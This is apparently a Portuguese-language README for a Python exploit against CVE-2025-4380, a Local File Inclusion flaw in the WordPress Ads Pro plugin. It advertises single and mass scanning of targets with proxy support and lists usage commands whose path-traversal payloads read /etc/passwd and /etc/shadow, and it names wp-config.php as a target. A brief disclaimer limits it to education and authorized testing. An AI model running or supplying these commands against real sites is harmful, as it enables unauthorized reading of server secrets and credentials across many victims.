
Exploit em Python para CVE-2025-4380, uma vulnerabilidade de Local File Inclusion no plugin Ads Pro do WordPress. Suporta varredura de alvos únicos e em massa com suporte a proxy.
Este exploit em Python tem como alvo o Plugin Ads Pro ≤ 4.89 para WordPress, vulnerável a Inclusão de Arquivo Local (LFI) através da ação AJAX bsa_preview_callback.
Um atacante não autenticado pode explorar isso para ler arquivos arbitrários do sistema de arquivos do servidor, incluindo arquivos sensíveis como /etc/passwd, wp-config.php e outros.
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
Requisição/Resposta do Burpsuite
bsa_template em bsa_preview_callbackEste exploit é fornecido apenas para fins educacionais e testes de segurança autorizados.
| Argumento | Descrição | Obrigatório |
|---|
-u, --url | URL do alvo (ex.: http://target.com) | Opcional |
-l, --list | Arquivo com lista de URLs alvo | Opcional |
-p, --path | Caminho do arquivo a incluir (ex.: ../../etc/passwd) | Sim |
-o, --output | Arquivo de saída para salvar resultados | Opcional |
--proxy | Proxy (ex.: http://127.0.0.1:8080) | Opcional |